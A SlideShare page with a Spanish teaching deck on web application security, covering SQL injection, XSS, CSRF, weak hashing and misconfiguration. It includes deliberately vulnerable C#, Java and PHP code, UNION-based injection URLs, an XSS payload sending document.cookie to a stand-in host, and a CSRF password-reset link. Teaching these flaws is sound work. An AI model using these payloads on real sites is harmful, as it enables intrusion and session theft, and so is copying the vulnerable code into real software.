SlideShare una empresa de Scribd logo

Seguridad 120618095150-phpapp01

E
Edmundo Salas
1 de 17
Descargar para leer sin conexión
    Seguridad de Aplicaciones Web Everth Juvenal Gallegos Puma
    ¿Que es un aplicacion web? En la ingeniería de software se denomina aplicación web a aquellas aplicaciones que los usuarios pueden utilizar accediendo a un servidor web a través de Internet o de una intranet mediante un navegador. En otras palabras, es una aplicación software que se codifica en un lenguaje soportado por los navegadores web en la que se confía la ejecución al navegador.
    Arquitectura de una AppWeb http://areyouahuman.com/
    HTTP● protocolo de transferencia de hipertexto. ● Ejemplo: Cliente: GET /index.php HTTP/1.1 Host: www.example.com User-Agent: nombre-cliente Cookie:phpsession=12aba789491279912 Connection: Close Servidor: HTTP/1.1 200 OK Date: Fri, 31 Dec 2011 23:59:59 GMT Content-Type: text/html Content-Length: 1221 <html> <body> <h1>Página principal de tuHost</h1>
    ¿A que nos enfrentamos?
    ¿Por donde empezamos?
    ¿Qué son los riesgos de seguridad en aplicaciones?
    Algunos Ejemplos ● SQL Injeccion: Injeccion de codigo sql en consultas codigo vulnerable C#: SqlCommand cmd = new SqlCommand("SELECT * FROM noticias WHERE id = '" +Request.QueryString(“id”) + "'", con); using( SqlDataReader rdr = cmd.ExecuteReader() );
    Java: Statement stmt = con.createStatement(); ResultSet rset = stmt.executeQuery("SELECT * FROM noticias WHERE id = '" + request.getParameter(“id”) + "';"); PHP: $query_result = mysql_query("SELECT * FROM noticias WHERE id = '" . $_GET[“id”]. "'");
    ● Testing http://ejemplo.com/noticias.php|asp|jsp?id=1 and 1=1 internamente: Select * from noticias where id=1 and 1=1 “muestra contenido” http://ejemplo.com/noticias.php|asp|jsp?id=1 and 1=2 internamente: Select * from noticias where id=1 and 1=2 “No muestra Contenido”
    ● Ataque allar el numero de columnas http://ejemplo.com/noticias.php|asp|jsp?id=1 order by 1,2,..etc hacer consultas http://ejemplo.com/noticias.php|asp|jsp?id=1 union select 1,2,table_name,4,5,..,etc from information_schema.tables http://ejemplo.com/noticias.php|asp|jsp?id=1 union select 1,2,table_name,4,5,..,etc from information_schema.tables. Consula a la tabla de usuario
    ● XSS: ataque del lado del cliente para injectar codigo html, javascript. Codigo Vulnerable: C#: response.write(request.querystring(“msg”)); JAVA: out.println(request.getParameter(“msg”)); PHP: echo $_GET[“msg”];
    ● Testing: http://ejemplo.com/buscar.php|asp|jsp? msg=<h1>Hola</h1>. ● Ataque: http://ejemplo.com/buscar.php|asp|jsp? msg=document.location=http://juaker.com/xss. php?datos=document.cookie;
    ● Falcificacion de peticiones: Ataque: <a href=”http://mipagina.com/resert.php? user=admin&newpass=admin”>Gana dinero con un click</a>. ● Almacenamiento Criptográfico Inseguro “cifrar adecuadamente datos importantes” ejemplo passcifrado=md5(salt+passoriginal);
    Defectuosa Configuracion de Seguridad: Ejemplo aspx: Padding oracle:Exposicion de codigo remotamente PHP: php en modo cgi:Exposicion y ejecucion de codigo remoto
    ● Errores de capa 8: Usuarios descuidados contraseñas debiles archivos de respaldo no borrados.
    Gracias ¿Preguntas? Everth.gallegos@gmail.com

Recomendados

Presentación dreamweaver
Presentación dreamweaverPresentación dreamweaver
Presentación dreamweavermagnafe
 
Presentación dreamweaver
Presentación dreamweaverPresentación dreamweaver
Presentación dreamweavermagnafe
 
Presentación dreamweaver1
Presentación dreamweaver1Presentación dreamweaver1
Presentación dreamweaver1magnafe
 
Cuidado con malware4eso
Cuidado con malware4esoCuidado con malware4eso
Cuidado con malware4esoEdmundo Salas
 
Inyecciones sql para todos
Inyecciones sql para todosInyecciones sql para todos
Inyecciones sql para todoscsaralg
 
JPA Best Practices
JPA Best PracticesJPA Best Practices
JPA Best PracticesCarol McDonald
 
Reuters: Pictures of the Year 2016 (Part 2)
Reuters: Pictures of the Year 2016 (Part 2)Reuters: Pictures of the Year 2016 (Part 2)
Reuters: Pictures of the Year 2016 (Part 2)maditabalnco
 
The Outcome Economy
The Outcome EconomyThe Outcome Economy
The Outcome EconomyHelge Tennø
 

Recomendados

Presentación dreamweaver
Presentación dreamweaverPresentación dreamweaver
Presentación dreamweavermagnafe
 
Presentación dreamweaver
Presentación dreamweaverPresentación dreamweaver
Presentación dreamweavermagnafe
 
Presentación dreamweaver1
Presentación dreamweaver1Presentación dreamweaver1
Presentación dreamweaver1magnafe
 
Cuidado con malware4eso
Cuidado con malware4esoCuidado con malware4eso
Cuidado con malware4esoEdmundo Salas
 
Inyecciones sql para todos
Inyecciones sql para todosInyecciones sql para todos
Inyecciones sql para todoscsaralg
 
JPA Best Practices
JPA Best PracticesJPA Best Practices
JPA Best PracticesCarol McDonald
 
Reuters: Pictures of the Year 2016 (Part 2)
Reuters: Pictures of the Year 2016 (Part 2)Reuters: Pictures of the Year 2016 (Part 2)
Reuters: Pictures of the Year 2016 (Part 2)maditabalnco
 
The Outcome Economy
The Outcome EconomyThe Outcome Economy
The Outcome EconomyHelge Tennø
 
Seguridad
SeguridadSeguridad
SeguridadVLASLOV
 
13.servidor http
13.servidor http13.servidor http
13.servidor httpGisellexcx
 
Servidor http
Servidor httpServidor http
Servidor httpUriieel NamiikaZee
 
Ventajas del desarrollo en ambiente web
Ventajas del desarrollo en ambiente webVentajas del desarrollo en ambiente web
Ventajas del desarrollo en ambiente webSergio Lopez
 
13 servidor http
13 servidor http13 servidor http
13 servidor httpIsaacVk
 
Programacion web c5 programacion del lado servidor
Programacion web c5 programacion del lado servidorProgramacion web c5 programacion del lado servidor
Programacion web c5 programacion del lado servidorAlejandro Hernandez
 
Cliente servidor
Cliente servidorCliente servidor
Cliente servidorEmmanuel Hernandez
 
Cliente servidor
Cliente servidorCliente servidor
Cliente servidorEmmanuel Hernandez
 
Web quest
Web questWeb quest
Web questiscalejandro
 
Aplicaciones web
Aplicaciones webAplicaciones web
Aplicaciones webMayry Peñafiel
 
sistemas basados en web
sistemas basados en websistemas basados en web
sistemas basados en webRoberto Calero
 
Distintas Herramientas Tecnológicas en la Actualidad
Distintas Herramientas Tecnológicas en la ActualidadDistintas Herramientas Tecnológicas en la Actualidad
Distintas Herramientas Tecnológicas en la ActualidadGregorys Gimenez
 
Servidores web
Servidores webServidores web
Servidores webalejandrahuerta
 
Servidores web
Servidores webServidores web
Servidores webalejandrahuerta
 
Arquitectura web EXPOSICION KAREN ANDRADE, EFRAIN SARANSIG
Arquitectura web EXPOSICION KAREN ANDRADE, EFRAIN SARANSIGArquitectura web EXPOSICION KAREN ANDRADE, EFRAIN SARANSIG
Arquitectura web EXPOSICION KAREN ANDRADE, EFRAIN SARANSIGEfrain Criss
 
Aplicaciones web
Aplicaciones webAplicaciones web
Aplicaciones webManuel Felipe ATAPAUCAR
 
Plataformas cliente servidor
Plataformas cliente servidorPlataformas cliente servidor
Plataformas cliente servidorEdsel Barbosa González
 
Diseño y edición de páginas web 1
Diseño y edición de páginas web 1Diseño y edición de páginas web 1
Diseño y edición de páginas web 1mpgandreu
 
(In)seguridad en componentes cliente de aplicaciones web - UMA Hackers Week 2015
(In)seguridad en componentes cliente de aplicaciones web - UMA Hackers Week 2015(In)seguridad en componentes cliente de aplicaciones web - UMA Hackers Week 2015
(In)seguridad en componentes cliente de aplicaciones web - UMA Hackers Week 2015erandog
 
Desarrollo de aplicaciones web
Desarrollo de aplicaciones webDesarrollo de aplicaciones web
Desarrollo de aplicaciones webCarlos Van de Velde
 

Más contenido relacionado

Similar a Seguridad 120618095150-phpapp01

Seguridad
SeguridadSeguridad
SeguridadVLASLOV
 
13.servidor http
13.servidor http13.servidor http
13.servidor httpGisellexcx
 
Ventajas del desarrollo en ambiente web
Ventajas del desarrollo en ambiente webVentajas del desarrollo en ambiente web
Ventajas del desarrollo en ambiente webSergio Lopez
 
13 servidor http
13 servidor http13 servidor http
13 servidor httpIsaacVk
 
Programacion web c5 programacion del lado servidor
Programacion web c5 programacion del lado servidorProgramacion web c5 programacion del lado servidor
Programacion web c5 programacion del lado servidorAlejandro Hernandez
 
sistemas basados en web
sistemas basados en websistemas basados en web
sistemas basados en webRoberto Calero
 
Distintas Herramientas Tecnológicas en la Actualidad
Distintas Herramientas Tecnológicas en la ActualidadDistintas Herramientas Tecnológicas en la Actualidad
Distintas Herramientas Tecnológicas en la ActualidadGregorys Gimenez
 
Arquitectura web EXPOSICION KAREN ANDRADE, EFRAIN SARANSIG
Arquitectura web EXPOSICION KAREN ANDRADE, EFRAIN SARANSIGArquitectura web EXPOSICION KAREN ANDRADE, EFRAIN SARANSIG
Arquitectura web EXPOSICION KAREN ANDRADE, EFRAIN SARANSIGEfrain Criss
 
Diseño y edición de páginas web 1
Diseño y edición de páginas web 1Diseño y edición de páginas web 1
Diseño y edición de páginas web 1mpgandreu
 
(In)seguridad en componentes cliente de aplicaciones web - UMA Hackers Week 2015
(In)seguridad en componentes cliente de aplicaciones web - UMA Hackers Week 2015(In)seguridad en componentes cliente de aplicaciones web - UMA Hackers Week 2015
(In)seguridad en componentes cliente de aplicaciones web - UMA Hackers Week 2015erandog
 

Similar a Seguridad 120618095150-phpapp01 (20)

Seguridad
SeguridadSeguridad
Seguridad
 
13.servidor http
13.servidor http13.servidor http
13.servidor http
 
Servidor http
Servidor httpServidor http
Servidor http
 
Ventajas del desarrollo en ambiente web
Ventajas del desarrollo en ambiente webVentajas del desarrollo en ambiente web
Ventajas del desarrollo en ambiente web
 
13 servidor http
13 servidor http13 servidor http
13 servidor http
 
Programacion web c5 programacion del lado servidor
Programacion web c5 programacion del lado servidorProgramacion web c5 programacion del lado servidor
Programacion web c5 programacion del lado servidor
 
Cliente servidor
Cliente servidorCliente servidor
Cliente servidor
 
Cliente servidor
Cliente servidorCliente servidor
Cliente servidor
 
Web quest
Web questWeb quest
Web quest
 
Aplicaciones web
Aplicaciones webAplicaciones web
Aplicaciones web
 
sistemas basados en web
sistemas basados en websistemas basados en web
sistemas basados en web
 
Distintas Herramientas Tecnológicas en la Actualidad
Distintas Herramientas Tecnológicas en la ActualidadDistintas Herramientas Tecnológicas en la Actualidad
Distintas Herramientas Tecnológicas en la Actualidad
 
Servidores web
Servidores webServidores web
Servidores web
 
Servidores web
Servidores webServidores web
Servidores web
 
Arquitectura web EXPOSICION KAREN ANDRADE, EFRAIN SARANSIG
Arquitectura web EXPOSICION KAREN ANDRADE, EFRAIN SARANSIGArquitectura web EXPOSICION KAREN ANDRADE, EFRAIN SARANSIG
Arquitectura web EXPOSICION KAREN ANDRADE, EFRAIN SARANSIG
 
Aplicaciones web
Aplicaciones webAplicaciones web
Aplicaciones web
 
Plataformas cliente servidor
Plataformas cliente servidorPlataformas cliente servidor
Plataformas cliente servidor
 
Diseño y edición de páginas web 1
Diseño y edición de páginas web 1Diseño y edición de páginas web 1
Diseño y edición de páginas web 1
 
(In)seguridad en componentes cliente de aplicaciones web - UMA Hackers Week 2015
(In)seguridad en componentes cliente de aplicaciones web - UMA Hackers Week 2015(In)seguridad en componentes cliente de aplicaciones web - UMA Hackers Week 2015
(In)seguridad en componentes cliente de aplicaciones web - UMA Hackers Week 2015
 
Desarrollo de aplicaciones web
Desarrollo de aplicaciones webDesarrollo de aplicaciones web
Desarrollo de aplicaciones web
 

Seguridad 120618095150-phpapp01

  • 1.     Seguridad de Aplicaciones Web Everth Juvenal Gallegos Puma
  • 2.     ¿Que es un aplicacion web? En la ingeniería de software se denomina aplicación web a aquellas aplicaciones que los usuarios pueden utilizar accediendo a un servidor web a través de Internet o de una intranet mediante un navegador. En otras palabras, es una aplicación software que se codifica en un lenguaje soportado por los navegadores web en la que se confía la ejecución al navegador.
  • 3.     Arquitectura de una AppWeb http://areyouahuman.com/
  • 4.     HTTP● protocolo de transferencia de hipertexto. ● Ejemplo: Cliente: GET /index.php HTTP/1.1 Host: www.example.com User-Agent: nombre-cliente Cookie:phpsession=12aba789491279912 Connection: Close Servidor: HTTP/1.1 200 OK Date: Fri, 31 Dec 2011 23:59:59 GMT Content-Type: text/html Content-Length: 1221 <html> <body> <h1>Página principal de tuHost</h1>
  • 5.     ¿A que nos enfrentamos?
  • 6.     ¿Por donde empezamos?
  • 7.     ¿Qué son los riesgos de seguridad en aplicaciones?
  • 8.     Algunos Ejemplos ● SQL Injeccion: Injeccion de codigo sql en consultas codigo vulnerable C#: SqlCommand cmd = new SqlCommand("SELECT * FROM noticias WHERE id = '" +Request.QueryString(“id”) + "'", con); using( SqlDataReader rdr = cmd.ExecuteReader() );
  • 9.     Java: Statement stmt = con.createStatement(); ResultSet rset = stmt.executeQuery("SELECT * FROM noticias WHERE id = '" + request.getParameter(“id”) + "';"); PHP: $query_result = mysql_query("SELECT * FROM noticias WHERE id = '" . $_GET[“id”]. "'");
  • 10.     ● Testing http://ejemplo.com/noticias.php|asp|jsp?id=1 and 1=1 internamente: Select * from noticias where id=1 and 1=1 “muestra contenido” http://ejemplo.com/noticias.php|asp|jsp?id=1 and 1=2 internamente: Select * from noticias where id=1 and 1=2 “No muestra Contenido”
  • 11.     ● Ataque allar el numero de columnas http://ejemplo.com/noticias.php|asp|jsp?id=1 order by 1,2,..etc hacer consultas http://ejemplo.com/noticias.php|asp|jsp?id=1 union select 1,2,table_name,4,5,..,etc from information_schema.tables http://ejemplo.com/noticias.php|asp|jsp?id=1 union select 1,2,table_name,4,5,..,etc from information_schema.tables. Consula a la tabla de usuario
  • 12.     ● XSS: ataque del lado del cliente para injectar codigo html, javascript. Codigo Vulnerable: C#: response.write(request.querystring(“msg”)); JAVA: out.println(request.getParameter(“msg”)); PHP: echo $_GET[“msg”];
  • 13.     ● Testing: http://ejemplo.com/buscar.php|asp|jsp? msg=<h1>Hola</h1>. ● Ataque: http://ejemplo.com/buscar.php|asp|jsp? msg=document.location=http://juaker.com/xss. php?datos=document.cookie;
  • 14.     ● Falcificacion de peticiones: Ataque: <a href=”http://mipagina.com/resert.php? user=admin&newpass=admin”>Gana dinero con un click</a>. ● Almacenamiento Criptográfico Inseguro “cifrar adecuadamente datos importantes” ejemplo passcifrado=md5(salt+passoriginal);
  • 15.     Defectuosa Configuracion de Seguridad: Ejemplo aspx: Padding oracle:Exposicion de codigo remotamente PHP: php en modo cgi:Exposicion y ejecucion de codigo remoto
  • 16.     ● Errores de capa 8: Usuarios descuidados contraseñas debiles archivos de respaldo no borrados.